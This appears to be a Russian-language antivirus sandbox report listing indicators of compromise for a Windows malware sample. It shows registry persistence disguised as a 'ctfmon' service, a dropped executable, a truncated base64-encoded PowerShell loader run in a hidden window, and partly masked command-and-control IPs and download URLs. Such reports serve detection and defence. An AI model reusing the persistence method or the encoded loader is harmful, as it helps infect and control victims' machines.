Техническая информация
- [<HKLM>\System\CurrentControlSet\Services\ctfmon] 'Start' = '00000002'
- [<HKLM>\System\CurrentControlSet\Services\ctfmon] 'ImagePath' = '"%WINDIR%\SysWOW64\nshipsec\ctfmon.exe"'
- 'ctfmon' "%WINDIR%\SysWOW64\nshipsec\ctfmon.exe"
- 'ctfmon' %WINDIR%\SysWOW64\nshipsec\ctfmon.exe
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -e JABYAGIAcwBjAGMAMQAwAD0AKAAoACcAWQA0ACcAKwAnAHUAZgAnACkAKwAoACcAcAAnACsAJwB4AGYAJwApACkAOwAmACgAJwBuACcAKwAnAGUAdwAtAGkAdAAnACsAJwBlAG0AJwApACAAJABlAG4AdgA6AHQAZQBNAFAAXABXAE8AcgBkAFwAMgAwAD...
- %TEMP%\word\2019\glkt07c9.exe
- %WINDIR%\syswow64\nshipsec\ctfmon.exe
- %TEMP%\word\2019\glkt07c9.exe в %WINDIR%\syswow64\nshipsec\ctfmon.exe
- '82.##9.200.118':80
- '18#.#1.158.15':8080
- '51.##5.15.193':7080
- http://mi###oors.md/backup/hFiCHxXv/
- http://51.###.15.193:7080/Mb2XMIWn/orajB/Hkt5eYse5s/F1leHNFbi/CAEJ5O/ via 51.##5.15.193
- DNS ASK mi###oors.md
- '%TEMP%\word\2019\glkt07c9.exe'
- '%WINDIR%\syswow64\nshipsec\ctfmon.exe'
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -e JABYAGIAcwBjAGMAMQAwAD0AKAAoACcAWQA0ACcAKwAnAHUAZgAnACkAKwAoACcAcAAnACsAJwB4AGYAJwApACkAOwAmACgAJwBuACcAKwAnAGUAdwAtAGkAdAAnACsAJwBlAG0AJwApACAAJABlAG4AdgA6AHQAZQBNAFAAXABXAE8AcgBkAFwAMgAwAD...' (со скрытым окном)